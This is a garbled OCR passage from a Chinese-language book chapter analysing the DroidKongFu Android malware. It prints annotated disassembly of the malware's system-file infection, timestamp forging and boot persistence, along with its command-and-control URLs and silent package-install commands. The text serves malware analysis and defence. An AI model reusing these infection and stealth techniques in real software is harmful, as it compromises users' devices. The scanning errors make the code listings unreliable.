dump 出 的 evil.bin 导 入 Android 模 拟 器 ， 进 入 adb shell ， 直 接 执行 evilbin 即 
可 ， 不 过 笔者 并 不 打算 这 么 做 ， 因 为 病毒 感染 过 一 次 就 不 会 再 被 感染 了 ， 
我 们 需要 先 使 用 strace 工 具 来 为 它 作为 一 次 API 国 数 调用 的 “快照 ” 

strace 是 Linux 系 统 中 赫赫 有 名 的 调试 工具 ， 它 能 够 捕获 程序 执行 时 调用 
的 所 有 系统 API 国 数 ，Android 系 统 的 源码 中 有 该 工具 的 移植 版 ， 并 且 默 认 
生成 的 AVD 中 就 附带 有 它 ， 可 以 直接 在 adb shell 下 使 用 。 使 用 方法 很 简单 ， 
首先 执行 以 下 2 条 命令 将 evil.bin 导 入 到 AVD 并 为 它 添加 执行 权限 : 

adb push evil.bin /data/local/tmp/ 

adb shell chmod 777 /data/local/tmp/evil.bin 

然后 执行 以 下 命令 获取 一 份 系统 API 调 用 “快照 ?并 保存 到 evil.strace 文 件 
m: 

adb shell strace /data/local/tmp/evil.bin » evil.strace 

执行 完 上 面 的 命令 后 ，evil.strace 文 件 就 记录 了 evil.bin 运 行 时 调用 的 所 
有 系统 API， 打 开 该 文件 ， 我 们 先 来 看 看 如 何 阅读 这 些 数据 。 例 如 这 行 数 
据 : 

sigaction(SIGILL, {0xb0005ad9, [], SA RESTART), (SIG DFL), 0) = 0 

开头 的 Sigaction 是 API 的 名 称 ， 括 号 里 面 的 参数 使 用 逗号 分隔， 人 花 括 
号 “{}” 括 起 的 部 分 为 一 个 参数 ， 其 中 的 内 容 可 以 是 结构 体 (结构 体 成 员 之 间 
使 用 逗号 “分 隔 ) 或 单一 字段 ， 等 号 “=” 后 面 的 内 容 为 疯 数 的 返回 值 。 

下 面 看 看 从 evil.strace 文 件 中 提取 的 一 段 内 容 。 


access("/system/framework/debuggerd", F OK) = -1 ENOENT (No such file or 


directory) 

open("/system/bin/debuggerd", O RDONLY|O LARGEFILE) - 3 
open("/system/framework/debuggerd", O RDWR|O, CREAT|O TRUNC|O, LARGEFILE, 
0600) = 4 

read(3, "X177ELFN1N1N1N0N0N0N0N0N0N0N0N0N2N30(N0N1N0N0N09422140000"..., 
4096) - 4096 

write(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0(\0\1\0\0\0°\221\0\000"..., 
4096) - 4096 

read(3, "VYYYYNONONONOYYYYNONONONOYYYYNONONONOYYYYNONONONO"..., 4096) = 1716 
write(4, "VyYYNONONONOYYYYNONONONOYYYYNONONONOYYYYNONONONO"..., 1716) = 
1716 

read(3, "", 4096) = 0 

close(3) = 0 

close(4) = 0 

Sync ( ) = 0 

sync() = 0 

chmod("/system/framework/debuggerd", 0755) = 0 


有 过 Linux 编 程 经 验 的 读者 应 该 一 眼 便 可 以 看 出 ， 这 段 代码 是 
将 /systemy/bin/debuggerd 文 件 复 制 一 份 保存 到 /system/framework/debuggerd。 
下 面 开 始 分 析 病 毒 核心 。 

1. 功能 字符 串 解密 

病毒 主体 同样 对 使 用 到 的 字符 串 进行 了 加 密 ， 加 密 的 算法 与 Native 病 毒 
启动 代码 使 用 的 是 一 样 的 手法 ， 只 是 简单 的 对 字符 串 的 每 个 字 节 进 行 取 
反 。 笔 者 数 了 一 下 ， 被 加 密 的 字符 串 多 达 76 条 ， 可 想 而 知 ， 病 毒 作 者 当初 
在 编写 代码 时 该 是 多 么 的 有 耐性 了 ! 功能 字符 串 解密 部 分 的 代码 笔者 将 其 
命名 为 init_predata， 与 Native 病 毒 启 动 代码 相应 的 钞 数 名 称 保持 一 致 。 

由 于 前 面 已 经 分 析 过 加 密 算法 ， 此 处 就 不 再 进行 讲解 了 。 

2. 设置 感染 标志 

病毒 在 发 作 前 ， 首 先 检 查 自 己 是 以 什么 身份 运行 ， 即 文件 自身 的 文件 
名 是 否 为 已 经 感染 的 系统 命令 (病毒 在 发 作 后 会 感染 系统 文件 ， 将 系统 音 
分 命令 替换 为 自身 ， 所 以 ， 病 毒 在 运行 前 会 检查 自己 是 不 是 以 系统 命令 形 
式 运行 的 。) 。 如 果 是 就 执行 命令 功能 传递 并 退出 。 否 则 ， 就 向 下 执行 ， 
检查 当前 环境 是 否 已 经 被 自己 感染 过 。 相 应 的 代码 如 下 : 


.text:0000CAF0 RootWork ; CODE XREF: main-3A|j 


.text:0000CAF0 LDR R5, -(PROP RUNNING FLAG ptr - OxECBS8) 
.text:0000CAF2 LDR R1, =0x44C 

.text:0000CAFA MOVS R2, #0x7F 

.text:0000CAF6 LDR RO, [R6,R5] ; Decrypted value: r0.bot.run 
.text:0000CAF8 ADD R1, SP 

.text:0000CAFA STR R1, [SP,£40x4F8-«name] 

.text:0000CAFC BL getpropertyvalue 

.text:0000CB00 CMP RO, 40 ; Ir0.bot .run 记 录 系 统 是 否 已 经 感染 了 该 木马 
.text:0000CB02 BEO setprop_r0 .bot .run 


.text:0000CB04 LDRB R3, [R0] 
.text:0000CB06 CMP Rar 450^ 


.text:0000CB08 BNE loc, CBOE 

.text:0000CB0A BL die 

.text:0000CBOE 

.text:0000CBOE loc CBOE ; CODE XREF: main+581j 
.text:0000CBOE CMP R3; $'1' 

.text:0000CB10 BNE setprop r0.bot.run 
.text:0000CB12 BL getprop r0.bot.val 
.text:0000CB16 

.text:0000CB16 setprop r0.bot.run ; CODE XREF: main+521 
.text:0000CB16 ; main+601] 
.text:0000CB16 LDR R5, [R6,R5] 

.text:0000CB18 LDR R1, -(a0 - OxCB20) 
.text:0000CB1A MOVS RO, R5 

.text:0000CB1C ADD R1. PE ;. "D 
.text:0000CB1E BL setprop s s s 
.text:0000CB22 BL infectsysfile ;感染 系统 文件 
.text:0000CB26 BL setprop r0.bot.val 
.text:0000CB2A LDR R1, =(al - OxCB32) 
.text:0000CB2C MOVS RO, R5 

.text:0000CB2b ADD RI, PE ; "px 
.text:0000CB30 BL setprop s s s 


Android £& Zt BJ [e TE (& Æ FH /system/bin/getprop E /system/bin/setprop fip F 
来 读 取 与 设置 的 ， 反 汇编 代码 中 的 getpropertyvalue 与 setprop_s_s_s 是 这 两 个 
命令 的 简单 封装 。DroidKongFu 变 种 病毒 在 运行 时 ， 会 检测 r0.botrun 属 性 值 
是 否 为 数值 1 或 字符 串 *1”， 以 此 来 判断 系统 是 否 已 经 被 感染 过 ， 如 果 被 感 
染 过 ， 就 跳 转 到 getprop_r0.bot.val 标 号 处 读 取 属 性 r0.bot.val 的 值 ， 使 用 当前 
时 间 减 去 这 个 差 值 ， 判 断 是 否 大 于 3600 (实质 为 上 次 感染 后 经 过 的 秒 


数 ) ， 如 果 读 取 失 败 或 差 值 大 于 3600 就 跳 到 setprop_r0.botrun 标 号 处 执行 ， 


相应 代码 如 下 : 
.text:0000D450 getprop r0.bot.val ; CODE XREF: main+621j 
.七 ext :0000D450 MOVS RO, #0 ; timer 
.text:0000D452 BLX time ; 获取 当前 时 间 
.text:0000D456 LDR R3, -(PROP RUNNING VAL ptr - OxECBS8) 
.text:0000D458 MOVS R7, RO 
.text:0000D45A LDR R1, [SP,#0x4F8+name] 
.text:0000D45C LDR RO, [R6,R3] ; Decrypted value: r0.bot.val 
.text:0000D45E MOVS R2, #0x7F 
.text:0000D460 BL getpropertyvalue ; 这 个 属性 值 保 存 的 是 病毒 发 作 的 时 间 
.text:0000D464 CMP RO, #0 
.text:0000D466 BNE loc D46C 
.text:0000D468 BL setprop r0.bot.run 
.text:0000D46C 
.text:0000DA46C loc D46C ; CODE XREF: main-9B6|j 
.text:0000D46C BLX atol 
.text:0000D470 MOVS R3, #0xE1 
.text:0000D472 SUBS R7, R7, RO ; 使 用 当前 时 间 值 减 去 保存 的 时 间 值 
.七 exXt :0000D474 LSLS R3, R3, #4 ; Oxel << 4 = 0xel0 
.text:0000D476 CMP R7, R3 ; 判断 感染 的 时 间 间 隔 0xe10 = 3600 秒 
.text:0000D478 BLE die 
.Cext:0000D47A BL setprop r0.bot.run 


r0.bot.val 的 值 是 在 感染 系统 文件 后 写 入 的 ， 记 录 的 是 病毒 感染 成 功 的 时 
间 ， 具 体 读者 可 以 阅读 笔者 注释 好 的 setprop_r0.bot.val 标 号 处 的 代码 。 
setprop rO.bot. run 处 的 代码 自 先 3 多 置 r0.bot.run 的 值 为 字符 串 “0”， 然 后 开始 感 

染 系 统 文件 ， 感 染 完 成 后 再 将 其 设置 为 字符 串 “1”。 

3. 感染 系统 文件 

感染 系统 文件 的 整个 过 程 非常 长 ， 而 且 代 码 非常 细致 。 首 先 来 
看 /system/bin/svc 文件 的 感染 ， 感 染 的 方法 是 新 建 一 个 临时 文 
件 /data/.bootemp ， 在 该 文件 第 一 行 写 入 字符 串 ”system/bimifconfig”， 然 后 
读 取 /system/bin/svc 文 件 的 内 容 写 入 其 中 ， 最 后 将 /data/. uei 
A X E [s] 8 /system/bin/sec 文件 中 ， 接 着 病毒 检测 系统 是 人 否 
有 /system/etc/init.d 文 件 ， 有 的 话 也 如 法 炮制 的 进行 感染 ， 具体 的 感染 代码 为 
infectsvcO 孙 数 。 相 应 代码 如 下 。 


:0000BDDE 
:0000BDEO 
:0000BDE2 
:0000BDEA 
:0000BDE6 
:0000BDE8 
:0000BDEA 
:0000BDEC 
:0000BDEE 
:0000BDFO0 
:0000BDF2 
:0000BDF6 
:0000BDF8 
:0000BDFA 
:0000BDFC 
:0000BDFE 
:0000BE00 
:0000BE02 
:0000BE04 
:0000BE08 
:0000BE0A 
:0000BEOC 
:0000BEOE 
:0000BE10 
:0000BE10 
:0000BE10 
:0000BE12 
:0000BE14 
:0000BE16 
:0000BE18 
:0000BE18 
:0000BE18 
:0000BE18 
:0000BE1A 
:0000BE1C 
:0000BE1E 
:0000BE20 
:0000BE20 writeifconfig 


:0000BDD0 infectsvc 


loc BE10 
LDRB 
CMP 


loc BE18 


MOVS 
STR 
STR 
STR 


R1, -( stack chk guard ptr - OxECBS8) 
R10, RO ; /System/bin/svc 
SP, R4 
RA, -( GLOBAL OFFSET TABLE  - OxBDEC) 
R9, R1 
RA, PC 
R3, [RA4,R1] 
R1, #0 ; oflag 
R3, [R3] 
R3, [SP,40x248-var. 2C] 
open ; 打开 /system/bin/svc 
R7, RO, #0 
loc_BECC 
R6, SP, #0x248+buf 
R2, #0x80 
RO, R7 = g 
R1, R6 > buf 
R2, R2, #2 
read ; 读 取 /system/bin/svc 文 件 内 容 
R11, RO ; 读 取 的 字 节 数 
RO, #0 
loc_BE10 ; 读 取 文 件 内 容 的 第 一 个 字符 
goreturn ; 没 读 到 内 容 就 返回 
; CODE XREF: infectsvc+3CÎj 
R3, [R6] ; 读 取 文件 内 容 的 第 一 个 字符 
R3, P ; 第 一 个 字符 是 否 为 '#， 
loc BE18 
readbit2 ; 读 第 2 个 字符 
; CODE XREF: infectsvc+441j 
; infectsvc«138.j 
R1, #0 
R6, [SP,#0x248+s1] 
R1, [SP,#0x248+n] 
R1, [SP,40x248-var. 23C] 


; CODE XREF: infectsvc-«16E|j 


;GOT 首 地 址 


.text:0000BE20 ; infectsvc«17CLj 
.text:0000BE20 LDR R2, -(BOOT MAGIC ptr - OxECBS8) 


.text:0000BE22 LDR R5, [RA4,R2] ; Decrypted value: /system/bin/ifconfig 
.text:0000BE24 STR R2, [SP,f*0x248-var. 244] 

.text:0000BE26 MOVS RO, R5 S8 

.text:0000BE28 BLX strlen 

. text : 0000BE2C MOVS R1, R5 s 52 

. text : 0000BE2E MOVS R2, RO ENS 


.text:0000BE30 LDR RO, [SP,£40x248-«s1] ; s1 
.text:0000BE32 BLX memcmp 
.text:0000BE36 CMP RO, #0 


.text:0000BE38 BEQ goreturn 

.text:0000BE3A LDR R3, -(BOOT TEMP FILE ptr - OxECB8) 

.text:0000BE3C LDR R1, z0x242 ; oflag 

.text:0000BE3E LDR R2, =0Xx1ED 

. text :0000BE40 LDR RO, [RA4,R3] ; Decrypted value:  /data/.bootemp 
.text:0000BE42 STR R3, [SP,*0x248-«var 238] 

.text:0000BE44 BLX open ; /data/ .bootemp 文 件 只 是 用 来 做 中 转 的 
.text:0000BE48 MOV R8, RO 

. text : 0000BE4A CMP RO, #0 

.text:0000BE4C BLT goreturn ; 跳 转 到 返回 处 


.text:0000BEA4E LDR R1, [SP,4s0x248-var 23C] 
.text:0000BE50 CMP R1, #0 


.text:0000BE52 BEQ loc BE5E 
.text:0000BE54 MOV RO, R8 s fd 
.text:0000BE56 MOVS R1, R6 ; buf 


.text:0000BE58 LDR R2, [SP,*t0x248«n] ; n 

.text:0000BE5A BLX write ; 在 /data/ .bootemp 文 件 第 一 行 写 入 /system/bin/ 
ifconfig 

.text:0000BE5E 

.text:0000BE5E loc BE5E ; CODE XREF: infectsvc-«821j 

. text: 0000BE5E LDR R2, [SP, #0x248+var_244] 

.text:0000BE60 LDR R5, [R4,R2] 


.text:0000BE62 MOVS RO, R5 ES | 
.text:0000BE64 BLX strlen 
.text:0000BE68 MOVS Riy RS ; buf 
.text:0000BE6A MOVS R2, RO i di 
.text:0000BE6C MOV RO, R8 ; fd 
.text:0000BE6E BLX write 


.text:0000BE72 LDR R1, [SP,£0x248-var. 23C] 


:0000BE74 
:0000BE76 
:0000BE78 
:0000BE7A 
:0000BE7C 
:0000BE80 
: 0000BE82 
:0000BE84 
:0000BE84 
:0000BE84 
:0000BE86 
:0000BE88 
:0000BE8A 
: 0000BE8C 
:0000BE90 
:0000BE92 
:0000BE94 
:0000BE96 
:0000BE98 
:0000BE9A 
:0000BE9E 
:0000BEAO0 
: 0000BEA2 
:0000BEA2 
:0000BEA2 
:0000BEA4 
:0000BEA8 
:0000BEAA 
:0000BEAE 
:0000BEB2 
:0000BEB6 
: 0000BEB8 
:0000BEBA 
:0000BEBC 
:0000BEBE 
:0000BECO 
: 0000BEC2 
:0000BEC6 
:0000BEC8 


MOV 
MOV 
SUBS 
LDR 
BLX 
MOV 
MOV 


loc BE84 
MOVS 
MOVS 
MOVS 
LSLS 
BLX 
SUBS 
BLE 
MOVS 
MOVS 
MOVS 
BLX 
CMP 
BEQ 


loc BEA2 

MOVS 
BLX 
MOVS 
BLX 
BLX 
BLX 
LDR 
MOV 
MOV 
LDR 
MOVS 
MOVS 
BL 

MOVS 
BLX 


R3, RII 
RO, R8 ; Td 
R2,, R3, Rl ; n 
R1, [SP,#0x248+s1] ; buf 
write 
R5, R8 
R8, R4 
; CODE XREF: infectsvc-«DO0Fj 
R2, $0x80 
RO, R7 s £d 
R1, R6 ; buf 
R2, R2, 42 ; 每 次 读 0x100 字 节 
read 
RA, RO, #0 
loc. BEA2 
RO, R5 s td 
R1, R6 ; buf 
R2, R4 $m 
write 
RA, RO 
loc  BE84 ; 循环 读 写 文件 ， 复 制 动 作 
; CODE XREF: infectsvc+C21 9 
RO, R7 ; Td 
close 
RO, R5 2s d 
close 
sync 
sync ; 强制 刷新 
R2, [SP,#0x248+var_238] 
RA, R8 
R1, R10 ; /system/bin/svc 
R5, [R4,R2] 
R2, 41 
RO, R5 ; /data/.bootemp 
rewritefile ; 感染 /system/bin/svc 文 件 
R0, R5 ; name 
unlink ; MER PE:XÍF/data/.bootemp 


.text:0000BED8 return ; CODE XREF: infectsvc-12ELj 


.text:0000BEE8 POP (RA-R7, PC) ; 图 数 返回 


.text:0000BF02 


.text:0000BF02 readbit2 ; CODE XREF: infectsVvc+461 
.text:0000BF02 . LDRB R3, [R6,#1] S 读 第 2 个 字符 

.text:0000BF04 CMP R3, 4'!' ; 第 2 个 字符 是 否 为 '! 
.text:0000BF06 BEQ loc_BFOA ; BUE X 

.text:0000BF08 B loc BE18 

.text:0000BF0A 

.text:0000BF0A loc BF0A ; CODE XREF: infectsvc-*136|j 
.text:0000BF0A MOV R2, R11 ; 读 取 的 字 节 数 

.text:0000BF0C CMP R2, #2 ; 文件 是 否 只 有 “#1!” 两 个 字 节 
.text:0000BFOE BGT readbit3 ; 读 第 3 个 字 节 

.text:0000BF10 B loc BE18 

.text:0000BF3E B writeifconfig 

. text : 0000BF40 

.text:0000BF40 gowriteifconfig ; CODE XREF: infectsvc-4146[]j 
.text:0000BF40 MOV R3, SP 


.text:0000BF42 MOVS R1, #3 
.text:0000BF44 ADDS R3, #0x1F 


.text:0000BF46 STR R3, [SP,40x248-*s1] 
.text:0000BF48 STR R1, [SP,#0x248+n] 

. text : 0000BF4A STR R1, [SP,#0x248+var_23C] 
. text : 0000BF4C B writeifconfig 


.text:0000BF4C ; End of function infectsvc 

上 面 的 代码 是 svc 文 件 的 整个 感染 过 程 ， 读 者 查看 代码 中 的 注释 与 轴 数 
调用 序列 ， 应 该 很 容易 理解 其 含义 。 另 外 ， 这 段 代码 的 精华 部 分 为 
rewritefile (0 图 数 ， 该 施 数 在 修改 系统 文件 时 非常 小 心 ， 我 们 看 它 的 代码 。 


„text: 
¿texts 
.text: 
„text: 
text: 
text: 
.text: 
.text: 
text: 
.text: 
.text: 
text: 
s text: 
.text: 
text: 
.text: 
text: 
text: 
text: 
.text: 
.text 
.text: 
.text: 
.text: 
text: 
„text: 
.text: 
.text: 
text: 


.text 
„tet: 
„text: 
text: 
.text: 
.text: 
.text: 
text: 
text: 
text: 


text: 
;text: 
.text: 
text: 
.text: 
„text 
„text: 
„text: 
text: 
texts 
.text: 


0000BB9C rewritefile 
0000BB9C var. 18 
0000BB9C var 14 


0000BB9C 
0000BB9C PUSH 
0000BB9E SUB 
0000BBAO MOVS 
0000BBA2 MOVS 
0000BBA4 MOVS 
0000BBA6 BL 
0000BBAA STR 
0000BBAC MOVS 
0000BBAE BL 
0000BBB2 MOVS 
0000BBB4 BLX 
0000BBB8 STR 
0000BBBA ADD 
0000BBBC BL 
0000BBCO MOVS 
0000BBC2 BL 
:0000BBC6 MOVS 
0000BBC8 BLX 
0000BBCC BLX 
0000BBDO BLX 
0000BBD4 CMP 
0000BBD6 BNE 
0000BBD8 MOVS 
0000BBDA MOVS 
0000BBDC BL 
:0000BBEO MOVS 
0000BBE2 MOVS 
0000BBE4 LSLS 
0000BBE6 BLX 
0000BBEA 
0000BBEA loc, BBEA 
0000BBEA MOVS 
0000BBEC BL 
0000BBFO MOV 
0000BBF2 BL 
0000BBF6 MOVS 
0000BBF8 BL 
0000BBFC ADD 
0000BBFE POP 
00008C00 
:0000BCO0 loc BCOO 
0000BCO0 MOVS 
0000BC02 MOVS 
0000BC04 BL 
0000BCO8 B 
0000BCO8 ; 


- -0x18 
= -0x14 
(RA-R6,LR) 
SP, SP, #8 
R4, R1 ; 要 写 入 的 文件 
R6, R2 ; R6 = 0 
R5, R0 ; /data/.bootemp 
getsysfilectime ; 获取 系统 文件 的 最 后 一 次 改变 时 间 
RO, [SP,#0xl8+var_14] 
RO, #0 
remountsystem  ; 重新 挂 载 系统 分 区 为 可 读 写 
RO, #0 ; timer 
time 


RO, [SP,£40x18-var. 18] 
RO, SP, #0xl8+var_14 


settime ; 设置 一 下 时 间 

RO, R4 ; 要 写 入 的 文件 

sublattr ; 去 掉 系 统 属性 好 删除 啊 

RO, R4 ; name 

unlink ; 删除 

sync ; 强制 刷新 

sync 

R6, #0 

loc BC00 ; /data/.bootemp 

RO, R5 

R1, R4 

writefileltofile2 ; 将 /data/ .bootemp 的 内 容 写 入 要 感染 
的 文件 

R1, #0xD2 

RO, R4 ; file 

RI; R1; #1 ; R1 = U644 

chmod ; 设置 为 大 家 都 可 读 写 


; CODE XREF: rewritefile«6Clj 


RO, R4 
addIattr ; 加 上 系统 属性 
RO, SP 
settime ; 再 次 设置 时 间 , 目的 是 不 改变 被 感染 文件 的 最 
后 访问 时 间 
RO, #1 
remountsystem  ; 重新 挂 载 系统 分 区 为 只 读 
SP, SP, $8 
(RA-R6, PC) ; 函数 返回 
; CODE XREF: rewritefile+3A1j 
RO, R5 ; /data/.bootemp 
R1, R4 ; 被 感染 文件 


copyandchangegid ; 拷贝 文件 并 更 改 用 户 组 ID 
loc BBEA 


End of function rewritefile 


首先 是 getsysfilectime()， 它 的 作用 是 获取 系统 文件 /systenybim/rild 或 
者 /system/bin/pm 的 最 后 一 次 修改 时 间 ， 病 毒 通 过 将 自己 最 后 的 修改 时 间 设 
置 与 它们 相同 ， 来 达到 隐藏 自己 不 被 发 现 的 目的 。 接 着 是 remountsystem()， 
它 的 作用 是 重新 挂 载 /system 目 录 为 可 读 可 写 ， 默 认 情 况 下 Android 系 统 
的 /system 目 录 是 只 读 挂 载 的 ， 即 使 是 root 权 限 的 用 户 也 不 能 修改 该 目录 下 的 
文件 ， 因 此 ， 病 毒 在 感染 系统 文件 前 需要 将 其 挂 载 为 可 读 可 写 。 接 着 是 
sublattr() 与 unlink()， 前 者 去 除 系统 文件 /system/bin/svc 不 可 删除 的 属性 ， 后 
者 则 执行 文件 删除 操作 。 当 上 面 的 操作 执行 完 后 ， 执 行 writefileltofile2() 完 
成 病毒 瑟 文 件 操 作 ， 它 的 作用 就 是 将 /data/.bootemp 的 内 容 复制 一 份 保存 为 
要 感染 的 文件 ， 通 过 writefileltofile20) 函 数 头 部 的 交叉 引用 可 以 看 到 ， 它 在 
病毒 程序 中 被 两 次 调用 ， 一 次 是 用 来 感染 /system/bin/svc， 另 一 次 则 是 用 来 
感染 /system/build.prop。 感 梁 完成 后 调用 chmod0) 修 改 其 属性 为 644， 接 着 调 
用 addIattr() 为 文件 添加 不 可 删除 属性 ， 随 后 调用 settime() 设 置 文件 最 后 修改 
时 间 ， 它 实际 上 是 调用 gettimeofday() 与 settimeofday() 来 完成 的 。 最 后 ， 代 码 
调用 了 remountsystem() 重 新 恢复 /system 目 录 为 只 读 。 人 至 此 ，/system/bin/svc 
的 感染 过 程 就 完了 。 另 外 ， 代 码 中 还 有 一 个 copyandchangegid OHI, R 
当 R2 寄 存 器 传递 进来 的 第 3 个 参数 不 为 0 时 它 才 会 被 执行 ， 此 处 传递 进来 的 
值 为 0， 因 此 它 不 会 被 执行 。 它 的 作用 也 是 感染 文件 ， 但 不 同 的 是 ， 它 调用 
chmod() 修 改 的 属性 为 755， 并 且 还 会 调用 chown() 更 改 文件 所 有 者 。 

感染 /system/bin/svc 的 孙 数 infectsvcO 只 是 系统 感染 函数 infectsysfile0) 的 
一 小 部 分 。infectsysfile() 会 多 次 判断 /systenylib/ibd1.so 是 否 可 以 访问 ， 接 着 
病毒 会 根据 不 同 地 方 的 判断 结果 ， 感 染 其 它 系 统 文 件 。 在 这 之 前 病毒 会 
调用 copy2frameworkdir() 备 份 /system/bin/vold 与 /system/bin/debuggerd 文 件 
到 /system/framework 目 录 下 ， 也 就 是 前 面 演示 的 evil.strace 文 件 的 内 容 片 断 。 
infectsysfile() 闵 数 接 下 来 会 感染 几 个 系统 中 重要 的 文件 。 这 些 文件 在 病毒 本 
体 的 .data.rel.ro 段 中 通过 INFECT_FEILS 变 量 指出 ， 如 图 12-11 所 示 。 


-data.rel.ro:88808EB88 ; "unknoun"' 


-data.rel.ro:8888EB8h INFECT FEILS DCD FILE CHD 1 ; gal? XREF: checkrun*28To 
.data.rel.ro:8888EB8A ; -tt off BR68To ... 
-data.rel.ro:88880EB8A H "inspira value: rm 
-data.rel.ro:8888EB88 DCD FILE CHD 2 ; Decrypted value: move 
-data.rel.ro:8888EBSC DCD FILE CHD 3 ; Decrypted value: mount 
-data.rel.ro:8008EB968 DCD FILE CHD 4 ; Decrypted value: ifconfig 
-data.rel.ro:8888EB9^ DCD FILE CHD 5 ; Decrypted value: chown 
-data.rel.ro:0888EB98 DCD FILE CHD 6 ; Decrypted value: debuggerd 
-data.rel.ro:8888EB9C DCD FILE CHD 7 ; Decrypted value:  vold 
-data.rel.ro:8088EBAG DCD FILE CHD 9 ; Decrypted value:  dhcpcd 
.data.rel.ro:8888EBR^ DCD FILE CHD 18 ; Decrypted value:  installd 
-data.rel.ro:8888EBA8 DCD TRRGET CHD 1 ; Decrypted value:  /system/bin/rm 
-data.rel.ro:8888EBRC DCD TRRGET CHD 2 ; Decrypted value:  //system/bin/moue 
.-data.rel.ro:8888EBBB8 DCD TRRGET CHD 3 ; Decrypted value:  /system/bin/mount 
.data.rel.ro:888BEBBA DCD TRRGET CHD 4 ; Decrypted value:  /system/bin/iFconfig 
-data.rel.ro:8888EBBS DCD TRRGET CHD 5 ; Decrypted value:  /system/bin/choun 


图 12-11 需要 感染 的 系统 文件 


感染 操作 是 通过 rewritefile0 国 数 完成 的 ， 这 个 图 数 前 面 已 经 分 析 过 了 
其 作用 就 是 一 个 文件 复制 的 过 程 。 这 次 感染 的 方法 是 使 用 病毒 主体 文件 来 
替换 这 些 系统 文件 ， 病 毒 主体 文件 大 小 为 27036 字 节 ， 因 此 病毒 感染 系统 
后 ， 可 以 在 DDMS 中 查找 /systemy/bin 目 录 下 与 病毒 本 体 文 件 大 小 相同 的 文 
件 ， 来 判断 哪些 系统 文件 被 成 功 感染 。 笔 者 在 终端 提示 符 下 执行 命令 “adb 
shell Is -l/system/bin |grep 27036” 后 输出 结果 如 图 12-12 所 示 。 


一 


feicong@feicong-ubuntu12: ~ 


feicong@feicong-ubuntu12:~$ adb shell ls -l /system/bin |grep 27036 
-rwxr-xr-x root shell 2011-02-04 06: chown 
-FWXF -XF root shell 2011-02-04 06: ifconfig 


-X 
-rwxr-xr-x root shell 2011-02-04 06: mount 
-X 


-FWXF -XF root shell 2011-02-04 06: move 
-rwxr-xr-x root shell 2011-02-04 06: rm 
feiconggfeicong-ubuntu12:-$ i 


图 12-12 ”被 感染 的 系统 文件 


现在 读者 应 该 明白 为 什么 要 往 /system/bin/svc 文 件 中 写 入 字符 串 
"/system/bin/ifconfig" Y IE. svc 文 件 是 Android 服 务 框架 的 启动 脚本 ， 当 
Android 系 统 启 动 时 该 脚本 被 会 调用 ， um. 开机 时 
神 不 知 鬼 不 觉 地 被 执行 了 ， 病 毒 通过 这 一 行 简单 的 代码 就 实现 了 开机 局 
动 。 

4. 获取 远程 指令 

感染 系统 完成 后 ， 病 毒 开 始 获取 系统 硬件 信息 ， 然 后 连接 远程 的 服务 
器 。 使 用 init_predata 0 图 数 解密 字符 串 后 ， 可 以 发 现 病毒 共有 如 下 3 个 服务 


器 地 址 : 


http://ad.pandanew.com:8511/search/ 

http://ad.phonego8.com:8511/search/ 

http: //ad.my968.com:8511/search/ 

以 及 sl.php、s2.php 与 s3.php 共 3 个 请 求 的 文件 。 使 用 本 机 的 telnet 命 令 
连接 以 上 3 个 网 址 的 8511 端 口 ， 发 现 已 经 无 法 连通 了 ， 因 此 ， 我 们 无 法 通过 
分 析 得 知 当初 这 些 网 址 反馈 给 DroidKongFu 变 种 病毒 哪些 信息 。 

5。 执 行 控制 命令 

在 解密 出 的 字符 串 中 ， 有 如 下 几 个 字符 串 值 得 注意 : 

AM START: /system/bin/am start -a android.intent.action.VIEW -d 

START APP: /system/bin/am start -n 

PM INSTALL: /system/bin/pm install -r 

PM UNINSTALL: /system/bin/pm uninstall 


解密 出 的 AM_START 字 符 串 可 以 看 作 是 要 执行 的 命令 ， 其 作用 是 通过 
命令 行 的 方式 启动 一 个 Activity， 而 START_APP 则 是 启动 一 个 Android 组 
件 。 通 过 IDA Pro 的 交叉 引用 ， 可 以 找到 START_APP 在 main0) 阔 数 中 被 调用 
过 ， 部 分 代码 如 下 : 


.text:0000CA48 runamstart ; CODE XREF: main:AM START|p 
.text:0000CA48 

.text:0000CA48 s = -0x214 

.text:0000CA48 var 14 = -0x14 

.text:0000CA64 BLX memset 

.text:0000CA68 BL write.rsid log ;这 个 函数 调用 返回 要 启动 的 组 件 
.text:0000CA6C SUBS R3, RO, #0 

.text:0000CA6E BEQ return 

.text:0000CA70 LDR R1, -(aSS 2 - OxCA7A) 

.text:0000CA72 LDR R2, -(START APP ptr - OxECBS8) 

.text:0000CA74 MOVS RO, R5 i s 

. text :0000CRA76 ADD Rl, PC p Tis es" 

.text:0000CA78 LDR R2, [RA4,R2] ; Decrypted value: /system/bin/am 
start -n 

.text:0000CA7A BLX sprintf 

.text:0000CA7E MOVS RÜ; R5 ; command 

.text:0000CA80 BLX system ; 通过 am start 方 式 启动 amndroid 程 序 的 组 件 
.text:0000CA84 


...... 


.text:0000CA94 POP {R4-R6, PC} ; KORIE 

在 使 用 AM_START 启 动 一 个 组 件 前 ， 调 用 了 write.rsid_log0 国 数 ， 这 个 
图 数 的 作用 是 将 要 启动 的 组 件 写 入 /data/localtmp/.rsid_log 文 件 ， 并 返回 需 
启动 的 组 件 名 (因为 无 法 获取 服务 器 指令 ，runamstart 标 号 处 的 代码 将 不 会 
被 执行 ， 文 件 的 内 容 也 就 不 得 而 知 了 ， 此 处 的 结论 是 笔者 猜测 而 来 的 ) 。 

PM_INSTALL 与 PM_UNINSTALL 用 于 静默 安装 或 卸载 软件 包 ， 在 病毒 
代码 中 没有 发 现 其 直接 调用 的 代码 ， 但 可 以 肯定 的 是 ， 这 两 个 字符 串 的 存 
在 一 定 是 为 了 偷偷 地 向 用 户 的 手机 中 安装 与 卸载 广告 或 木马 软件 。 

静态 分 析 病 毒 主体 的 代码 比较 累 人 ， 加 上 无 法 获取 到 需要 执行 的 指 
令 ， 对 DroidKongFu 变 种 病毒 的 分 析 到 这 里 就 算 结束 了 ， 详 细 的 注释 读者 可 
以 使 用 IDA Pro 导 入 本 书 配套 源 代码 中 本 小 节 的 evilidc 进 行 查看 。 


12.5 DroidKongFu 病 毒 框架 总 结 


通过 上 面 的 分 析 ， 我 们 已 经 了 解 了 DroidKongFu 变 种 病毒 所 有 的 执行 流 
程 。 为 了 方便 读者 理解 ， 笔 者 画 了 一 张 病毒 执行 流程 图 辅助 读者 分 析 ， 如 


图 12-13 所 示 。 
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图 12-13 ”DroidKongFu 变 种 病毒 执行 流程 图 
ÆRA 
12.6 ”病毒 防治 


